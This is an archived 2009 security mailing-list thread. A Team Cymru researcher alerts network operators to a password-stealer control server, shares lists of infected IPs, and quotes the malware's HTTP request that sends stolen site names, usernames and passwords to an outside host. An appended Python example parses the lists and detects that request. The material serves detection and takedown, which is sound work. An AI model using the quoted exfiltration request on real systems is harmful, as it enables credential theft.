[nsp-sec] ACK 2119, 8786, 8434. 130K+ Infected IPs on ~3600 ASNs

bjorn.jensen at telenor.com bjorn.jensen at telenor.com
Thu Oct 1 15:51:55 EDT 2009


ACK for 2119, 8434, 8786

Thank you for sharing information.


/Bjorn
________________________________________
From: nsp-security-bounces at puck.nether.net [nsp-security-bounces at puck.nether.net] on behalf of Stephen Gill [gillsr at cymru.com]
Sent: 1 October 2009 19:47
To: NSP-SEC List
Subject: [nsp-sec] 130K+ Infected IPs on ~3600 ASNs

----------- nsp-security Confidential --------

Hi Team,

This password stealer head end IP appears to be quite busy:

76.73.37.250

We're working w/ the ISP on takedown, however in the meantime here is a list
of 130K+ infected IPs seen talking to it primarily via TCP 80 (reporting
stolen credentials) and UDP 7006 - UDP 7012.  I don't anticipate an IP
takedown to last forever because they can likely re-route via DNS.

    ASN list:
    https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt

    Infected IP list:
    https://www.cymru.com/nsp-sec/Owned/stealer/
    eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt

Timestamps in UTC.

Some clarification on the formatting:

3       | 18.26.4.9        | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology

The timestamp column will begin with a U or a T.  U is for UDP, T for TCP.
When possible we've preferred to list out a T if we have seen any TCP 80
traffic from the client IP in question.

It looks like the malware on the client may choose its source IP address
since we noticed some RFC 1918 traffic so it is possible the UDP data will
not match in all cases.  I cannot guarantee that the UDP traffic is not part
of some type of actual software but it sure looks suspicious.  Here is a
public URL for reference:

    http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html

As there is UDP involved we cannot guarantee that there are 0 spoofed IPs,
but on the TCP side that is another matter.

HTTP credential stealing looks something like this:

GET /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USERNAME&p=STOLEN_PASSWORD HTTP/1.1
User-Agent: Mozilla/4.0 (compatible).
Host: hotshows.org.
.


Cheers,
-- steve

--
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com




_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net
https://puck.nether.net/mailman/listinfo/nsp-security

Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security counter-measures.
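Added example (not part of the thread or of Team Cymru's tooling): a small Python parser for the per-ASN list format Steve describes (ASN | IP | U/T timestamp | AS name), which separates TCP-confirmed clients from UDP-only ones that may be spoofed, plus a matcher for the GET /pp2/?s=&u=&p= exfil pattern so it can be run over proxy request lines. The MIT line is the one quoted above; the other sample lines and all function names are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# One line of the per-ASN lists described in the post:
#   ASN | client IP | <U|T> YYYY/MM/DD HH:MM:SS.ffffff (UTC) | AS name
RECORD_RE = re.compile(
    r"^\s*(?P<asn>\d+)\s*\|\s*(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s*\|\s*"
    r"(?P<proto>[UT])\s+(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s*\|\s*"
    r"(?P<asname>.*\S)\s*$"
)

def parse_record(line):
    """Parse one list line; returns None for lines that do not match the format."""
    m = RECORD_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["asn"] = int(rec["asn"])
    # T: TCP 80 traffic was seen, so the client address completed a handshake.
    # U: only UDP 7006-7012 was seen, so the source may be spoofed or RFC 1918.
    rec["tcp_confirmed"] = rec["proto"] == "T"
    return rec

def triage(lines):
    """Count TCP-confirmed and UDP-only hits per ASN (for prioritising notifications)."""
    counts = {}
    for line in lines:
        rec = parse_record(line)
        if rec is None:
            continue
        bucket = counts.setdefault(rec["asn"], {"tcp": 0, "udp": 0})
        bucket["tcp" if rec["tcp_confirmed"] else "udp"] += 1
    return counts

def is_stealer_beacon(request_line):
    """Match the exfil request quoted in the post: GET /pp2/?s=<site>&u=<user>&p=<pass>."""
    parts = request_line.split()
    if len(parts) != 3 or parts[0] != "GET" or not parts[2].startswith("HTTP/"):
        return False
    url = urlsplit(parts[1])
    if url.path != "/pp2/":
        return False
    params = parse_qs(url.query, keep_blank_values=True)
    return {"s", "u", "p"} <= set(params)

# Constructed sample input: the first line is quoted from the post, the rest are made up.
SAMPLE_LINES = [
    "3       | 18.26.4.9        | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology",
    "3       | 18.26.4.10       | T 2009/10/01 04:02:11.000001 | MIT-GATEWAYS - Massachusetts Institute of Technology",
    "not a record line",
]
```

Run `triage(SAMPLE_LINES)` to get per-ASN counts, and feed `is_stealer_beacon` the request line from a web proxy log to flag clients still reporting credentials after the head-end IP changes.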